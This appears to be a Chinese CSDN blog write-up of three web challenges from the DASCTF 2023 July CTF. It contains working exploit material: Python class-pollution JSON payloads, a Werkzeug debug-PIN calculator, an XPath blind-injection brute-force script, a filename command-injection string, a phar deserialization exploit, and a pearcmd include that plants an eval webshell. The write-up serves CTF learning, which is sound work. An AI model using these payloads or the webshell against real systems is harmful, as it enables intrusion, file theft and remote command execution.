[DASCTF 2023 & 0X401七月暑期挑战赛] web刷题记录

已于 2023-11-28 20:16:36 修改
阅读量368 收藏 1
点赞数
分类专栏: 刷题记录 文章标签: 前端 python 学习 web安全 安全 php
于 2023-11-28 13:17:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/134652171
版权

文章目录

EzFlask

考点:python原型链污染、flask框架理解、pin码计算

源码如下

import uuid

from flask import Flask, request, session
from secret import black_list
import json

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())

def check(data):
    for i in black_list:
        if i in data:
            return False
    return True

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

class user():
    def __init__(self):
        self.username = ""
        self.password = ""
        pass
    def check(self, data):
        if self.username == data['username'] and self.password == data['password']:
            return True
        return False

Users = []

@app.route('/register',methods=['POST'])
def register():
    if request.data:
        try:
            if not check(request.data):
                return "Register Failed"
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Register Failed"
            User = user()
            merge(data, User)
            Users.append(User)
        except Exception:
            return "Register Failed"
        return "Register Success"
    else:
        return "Register Failed"

@app.route('/login',methods=['POST'])
def login():
    if request.data:
        try:
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Login Failed"
            for user in Users:
                if user.check(data):
                    session["username"] = data["username"]
                    return "Login Success"
        except Exception:
            return "Login Failed"
    return "Login Failed"

@app.route('/',methods=['GET'])
def index():
    return open(__file__, "r").read()

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5010)

分析一下,首先定义了check函数进行黑名单检测,然后是存在merge函数可以进行原型链污染,定义user的类;/register路由下先进行check检测,接收json格式数据,进行merge原型链污染;/login路由下,接收json数据,判断username的session是否正确;/路由下会读取源码文件(我们可以污染进行回显)

方法一 python原型链污染

前置知识

NodeJs原型链污染中,对象的__proto__属性,指向这个对象所在的类的prototype属性。如果我们修改了son.__proto__中的值,就可以修改父类。
在Python中,所有以双下划线__包起来的方法,统称为Magic Method(魔术方法),它是一种的特殊方法,普通方法需要调用,而魔术方法不需要调用就可以自动执行。

由于跟路由下会读取源码内容,我们可以污染__file__全局变量实现任意文件读取
由于过滤了__init__,我们可以通过Unicode编码绕过或者用类中的check代替
payload如下

{
    "username":"1",
    "password":"1",
    "__class__":{
        "\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f":{
            "__globals__":{
                "__file__":"/proc/1/environ"
            }
        }
    }
}

然后再访问得到flag
在这里插入图片描述

方法二 flask框架静态文件

前置知识

在 Python 中,全局变量 app 和 _static_folder 通常用于构建 Web 应用程序,并且这两者在 Flask 框架中经常使用。

  1. app 全局变量:
    • app 是 Flask 应用的实例,是一个 Flask 对象。通过创建 app 对象,我们可以定义路由、处理请求、设置配置等,从而构建一个完整的 Web 应用程序。
    • Flask 应用实例是整个应用的核心,负责处理用户的请求并返回相应的响应。可以通过 app.route 装饰器定义路由,将不同的 URL 请求映射到对应的处理函数上。
    • app 对象包含了大量的功能和方法,例如 route、run、add_url_rule 等,这些方法用于处理请求和设置应用的各种配置。
    • 通过 app.run() 方法,我们可以在指定的主机和端口上启动 Flask 应用,使其监听并处理客户端的请求。
  2. _static_folder 全局变量:
    • _static_folder 是 Flask 应用中用于指定静态文件的文件夹路径。静态文件通常包括 CSS、JavaScript、图像等,用于展示网页的样式和交互效果。
    • 静态文件可以包含在 Flask 应用中,例如 CSS 文件用于设置网页样式,JavaScript 文件用于实现网页的交互功能,图像文件用于显示图形内容等。
    • 在 Flask 中,可以通过 app.static_folder 属性来访问 _static_folder,并指定存放静态文件的文件夹路径。默认情况下,静态文件存放在应用程序的根目录下的 static 文件夹中。
    • Flask 在处理请求时,会自动寻找静态文件的路径,并将静态文件发送给客户端,使网页能够正确地显示样式和图像。

综上所述,app 和 _static_folder 这两个全局变量在 Flask 应用中都扮演着重要的角色,app 是整个应用的核心实例,用于处理请求和设置应用的配置,而 _static_folder 是用于指定静态文件的存放路径,使网页能够正确地加载和显示样式和图像。

我们污染"_static_folder":"/",使得静态目录直接设置为了根目录,那么我们就可以访问/static/proc/1/environ
payload如下

{
    "username":"1",
    "password":"1",
    "\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f":{
        "__globals__":{
        "app":{
            "_static_folder":"/"
            }
        }
    }
}

访问静态文件即可
在这里插入图片描述

方法三 pin码计算

由于我们已经知道存在原型链污染,我们可以结合任意文件读取有效信息计算pin码
脚本如下

import hashlib
from itertools import chain
probably_public_bits = [
    'root'  
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.10/site-packages/flask/app.py'
]

private_bits = [
    '2485376927778',  
    '96cec10d3d9307792745ec3b85c896208a7dfdfc8f7d6dcb17dd8f606197f476c809c20027ebc4655a4cdc517760bc44'
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

然后访问/console即可
在这里插入图片描述

MyPicDisk

考点:xxe盲注、命令执行、phar反序列化

打开题目,给了登录框,试试万能密码抓包看看
发现有hint
在这里插入图片描述
访问把源码下载下来

<?php
session_start();
error_reporting(0);
class FILE{
    public $filename;
    public $lasttime;
    public $size;
    public function __construct($filename){
        if (preg_match("/\//i", $filename)){
            throw new Error("hacker!");
        }
        $num = substr_count($filename, ".");
        if ($num != 1){
            throw new Error("hacker!");
        }
        if (!is_file($filename)){
            throw new Error("???");
        }
        $this->filename = $filename;
        $this->size = filesize($filename);
        $this->lasttime = filemtime($filename);
    }
    public function remove(){
        unlink($this->filename);
    }
    public function show()
    {
        echo "Filename: ". $this->filename. "  Last Modified Time: ".$this->lasttime. "  Filesize: ".$this->size."<br>";
    }
    public function __destruct(){
        system("ls -all ".$this->filename);
    }
}
?>
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>MyPicDisk</title>
</head>
<body>
<?php
if (!isset($_SESSION['user'])){
  echo '
<form method="POST">
    username:<input type="text" name="username"></p>
    password:<input type="password" name="password"></p>
    <input type="submit" value="登录" name="submit"></p>
</form>
';
  $xml = simplexml_load_file('/tmp/secret.xml');
  if($_POST['submit']){
    $username=$_POST['username'];
    $password=md5($_POST['password']);
    $x_query="/accounts/user[username='{$username}' and password='{$password}']";
    $result = $xml->xpath($x_query);
    if(count($result)==0){
      echo '登录失败';
    }else{
      $_SESSION['user'] = $username;
        echo "<script>alert('登录成功!');location.href='/index.php';</script>";
    }
  }
}
else{
    if ($_SESSION['user'] !== 'admin') {
        echo "<script>alert('you are not admin!!!!!');</script>";
        unset($_SESSION['user']);
        echo "<script>location.href='/index.php';</script>";
    }
  echo "<!-- /y0u_cant_find_1t.zip -->";
  if (!$_GET['file']) {
    foreach (scandir(".") as $filename) {
      if (preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        echo "<a href='index.php/?file=" . $filename . "'>" . $filename . "</a><br>";
      }
    }
    echo '
  <form action="index.php" method="post" enctype="multipart/form-data">
  选择图片:<input type="file" name="file" id="">
  <input type="submit" value="上传"></form>
  ';
    if ($_FILES['file']) {
      $filename = $_FILES['file']['name'];
      if (!preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        die("hacker!");
      }
      if (move_uploaded_file($_FILES['file']['tmp_name'], $filename)) {
          echo "<script>alert('图片上传成功!');location.href='/index.php';</script>";
      } else {
        die('failed');
      }
    }
  }
  else{
      $filename = $_GET['file'];
      if ($_GET['todo'] === "md5"){
          echo md5_file($filename);
      }
      else {
          $file = new FILE($filename);
          if ($_GET['todo'] !== "remove" && $_GET['todo'] !== "show") {
              echo "<img src='../" . $filename . "'><br>";
              echo "<a href='../index.php/?file=" . $filename . "&&todo=remove'>remove</a><br>";
              echo "<a href='../index.php/?file=" . $filename . "&&todo=show'>show</a><br>";
          } else if ($_GET['todo'] === "remove") {
              $file->remove();
              echo "<script>alert('图片已删除!');location.href='/index.php';</script>";
          } else if ($_GET['todo'] === "show") {
              $file->show();
          }
      }
  }
}
?>
</body>
</html>

分析如下

  1. 定义了FILE类,包含三个属性。实例化的时候检测是否包含/,且是否只有一个.符号。然后定义了remove和show方法,最后会对文件名命令执行(此处可以rce)
  2. 然后就是接收登陆参数以及session值是否为admin
  3. 最后对上传文件进行白名单检测,然后提供remove和show功能,上传成功后会对文件名实例化

我们刚刚万能密码登录后发现并不是admin的session,所以还是不行
我们看向下面代码,存在xxe漏洞

if($_POST['submit']){
    $username=$_POST['username'];
    $password=md5($_POST['password']);
    $x_query="/accounts/user[username='{$username}' and password='{$password}']";
    $result = $xml->xpath($x_query);
    if(count($result)==0){
      echo '登录失败';
    }else{
      $_SESSION['user'] = $username;
        echo "<script>alert('登录成功!');location.href='/index.php';</script>";
    }
  }

其中重要代码$x_query="/accounts/user[username='{$username}' and password='{$password}']";构建一个XPath查询语句,用于在XML文件中查

xxe盲注脚本如下

import requests
import time
url ='http://0f5e84c5-9aba-4f79-9744-65916fd167a9.node4.buuoj.cn:81/'


strs ='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'


flag =''
for i in range(1,100):
    for j in strs:
        #猜测根节点名称 #accounts
        # payload_1 = {"username":"<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password>".format(i,j),"password":123}
        # payload_username ="<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password>".format(i,j)

        #猜测子节点名称 #user
        # payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        # payload_username ="<username>'or substring(name(/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password>".format(i,j)



        #猜测accounts的节点
        # payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #猜测user节点
        # payload_4 ="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #跑用户名和密码 #admin #003d7628772d6b57fec5f30ccbc82be1
        # payload_username ="<username>'or substring(/accounts/user[1]/username/text(), {}, 1)='{}'  or ''='".format(i,j)、
        # payload_username ="<username>'or substring(/accounts/user[1]/password/text(), {}, 1)='{}'  or ''='".format(i,j)


        payload_username ="<username>'or substring(/accounts/user[1]/password/text(), {}, 1)='{}'  or ''='".format(i,j)
        data={
            "username":payload_username,
            "password":123,
            "submit":"1"
        }


        print(payload_username)
        r = requests.post(url=url,data=data)
        time.sleep(0.1)
        # print(r.text)


        if "登录成功" in r.text:
            flag+=j
            print(flag)
            break

    if "登录失败" in r.text:
        break

print(flag)

注出来的再拿去解密得到密码
在这里插入图片描述
登陆后发现有文件上传功能

方法一 字符串拼接执行命令

我们已经知道上传图片成功后会对FILE实例化,结合下面实现rce

public function __destruct(){
        system("ls -all ".$this->filename);
    }

注:一定不能报错,否则不会执行destruct

我们可以bp抓包,修改文件名如下

;`echo Y2F0IC9hZGphcyo= | base64 -d`;1.jpg

在这里插入图片描述

然后上传成功后访问?file=上传文件名即可
在这里插入图片描述

方法二 phar反序列化

这个思路的利用点如下

if ($_GET['todo'] === "md5"){
	echo md5_file($filename);
}

md5_file函数
在这里插入图片描述

一般参数是string形式的文件名称($filename)的函数,都可以用来解析phar

我们可以创建phar文件修改后缀,然后再file读取(todo参数值为md5)
exp

<?php

class FILE{
    public $filename=';cat /adjaskdhnask_flag_is_here_dakjdnmsakjnfksd';
    public $lasttime;
    public $size;
    
}
$a=new FILE();
$phar = new Phar("hacker.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

然后bp抓包修改后缀
在这里插入图片描述然后用phar伪协议读取即可

?file=phar://hacker.jpg&&todo=md5

在这里插入图片描述

ez_cms

考点:熊海cms

拿到题目,去网上找找相关漏洞,发现存在后台登陆
在这里插入图片描述盲猜用户为admin,然后密码爆破一下为123456
在这里插入图片描述
登录后,我们查到存在任意文件读取漏洞
在这里插入图片描述

试试读取源码
在这里插入图片描述
然后下载下来

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

分析一下,addslashes函数禁用了伪协议,将参数进行拼接
不过我们可以尝试pearcmd读取
payload如下

?+config-create+/&r=../../../../usr/share/php/pearcmd&/<?=@eval($_POST['cmd']);?>+/tmp/shell.php

坑点:这里的pearcmd的路径不为默认路径,出题人改了

我们bp抓包发送,成功写入
在这里插入图片描述
访问?r=../../../../tmp/shell
在这里插入图片描述
命令执行得到flag
在这里插入图片描述

_rev1ve
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
关于STM32 IAP升级之为什么APP执行要&0x2FFE0000这个数值的原因(基于STM32F446RET6)
Bruce.yang的嵌入式之旅
09-20 4724
如下图所示,这是我目前用的一款CPU:STM32F446RET6,大小是512KB 我的bootloader编译完以后占用了26KB的FLASH内存。 我的APP占用了363K的FLASH内存,主要是因为LCD显示,刷的图片很多,很占内存。 为了给以后的Bootloader扩展更多的功能需求,我给我的Bootloader栈顶占用FLASH 0x10000的大小,也就是64k。 所以,目前Boo...
2023.5.3~2023.5.9】CTF刷题记录
qq_66633020的博客
05-03 884
获取题目附件,根据题目名可知是由python编写,所以直接用uncompyle6进行反编译,dump出py文件。可以看出程序对输入内容进行了两个加密,这两个加密可逆并知道了密文,开始写解密脚本。题目:[GWCTF 2019]pyre。日期:2023.5.3。方向:REVERSE。
WebDASCTF 2023 & 0X401七月暑期挑战赛题解
最新发布
uuzeray的博客
04-13 1252
让俺看看401web题。
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
Jay17的博客
08-05 1557
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
DASCTF 2023 & 0X401七月暑期挑战赛 webEzFlask
m0_63138919的博客
08-30 284
1
HZNUCTF-ezflask
qq_44640313的博客
03-27 586
jinja2的注入
SSTI Flask做题记录1
Firebasky的博客
10-12 1023
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
buuctf--easyflask
qq_46263951的博客
01-04 882
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
0x1ff在C语言中,C语言学习--位操作
weixin_39525812的博客
05-21 1977
1. 在实践中常见的位操作有:位与(&)、位或(|)、位异或(^)、位取反(~)分析:位与(&):二进制数(0或1),与1位与是无变化(本身),与0位于变成0.位或(|):二进制数(0或1),与1位或是变成1,与0位或无变化(本身).位异或(^):二进制数(0/1),与1位异或是取反,与0位异或无变化。(记忆方法是:相同为0,不同为1)位取反(~):二进制数(0/1), 原先是0...
0x01——位运算
qq_62213124的博客
03-14 3457
0x01———位运算 运算符优先级 从左到右优先级依次降低 加减 移位 比较大小 位与 异或 位或 +,- <<,>> <,>==,!= & xor(C++^) |
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装PythonFlask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
DASCTF&NepCTF 部分writeup
weixin_44145820的博客
06-26 4363
目录PWNoooorderspringboardeasyheap(本地成功)RET0p GearpyCharm521MagiaMISC透明度 PWN oooorder 一道不太复杂的题目,利用点都是之前遇到的,运气好拿到了一血 edit中进行了realloc,如果size为0就会执行free,利用这个进行double free,由于禁用了execve,需要用setcontext执行mprotect并执行orw的shellcode 关于orw部分,具体请见这篇博客:BUUCTF-PWN rctf_2019_
HZNUCTF2023 web
weixin_63231007的博客
05-07 1625
HZNUCTF校赛 赛后复现
HSCSEC 2023 个人练习
weixin_44770698的博客
02-19 730
HSCSEC 2023 练习
GACTF2020 simpleflask& EZFLASK
汗的博客
09-03 1377
信息收集 直接访问,提示方法不允许 使用burpsuite,右键-change request method 提示了个name,猜测是参数 因为题目是flask,容易想到ssti,直接试name={{2*2}} 再试,因为可能是有过滤、waf之类的name={{2-2}},可以看到2-2有了结果 可以确定是存在ssti的,接下来就是具体的bypass和get flag了 bypass&利用 用burp进行一次fuzz,还做不到颅内ctf,以下是一个简单的fuzz字符list [ ] ( \
DASCTF 2023 & 0X401七月暑期挑战赛web复现
weixin_63231007的博客
08-02 1202
python原型链污染&xpath注入&pearcmd文件包含&django框架
Flask(四)
qq_60381063的博客
09-11 260
2,session:session和cookie的作用有点类似,都是为了存储用户相关的信息,不同的是,cookie是存储在本地浏览器,session是一个思路、一个概念、一个服务器存储授权信息的解决方案,不同的服务器,不同的框架,不同的语言有不同的实现,虽然实现不同,但是他们的目的都是服务器为了方便存储数据的,session的出现,是为了解决cookie存储数据不安全的问题。wtforms表单的两个主要功能是验证用户提交数据的合法性以及渲染模板,当然还包括一些其他功能:CSRF保护、文件上传等。
NUAACTF - Web - Ez_Flask
1tachi的博客
12-27 601
按照提示随便传一个:?name=123 可能存在模板渲染,检测一下:?name=${2*7} ?name={{7*7}} ?name={{7*'7'}} 发现是 jinja2 渲染 看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}} 可以一点一点的往下找,也可以直接写payload {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ ==.
【CTF】Python原型链污染
Luminous_song的博客
08-05 1022
Python中每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。
i&0x01 i&0x02 i&0x04什么意思
06-15
i&0x01, i&0x02 和 i&0x04 是位运算,用于判断 i 的二进制表示中的某一位是否为 1。其中,0x01、0x02 和 0x04 是十六进制数,表示二进制数 00000001、00000010 和 00000100。按位与运算符 & 的规则是:两个二进制位都为 1 时,结果才为 1,否则为 0。因此,i&0x01 的结果就是 i 的二进制表示的最低位(即个位)是否为 1;i&0x02 的结果就是 i 的二进制表示的次低位(即十位)是否为 1;i&0x04 的结果就是 i 的二进制表示的第三位(即百位)是否为 1。如果某一位为 1,则结果为非零数,否则为 0。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值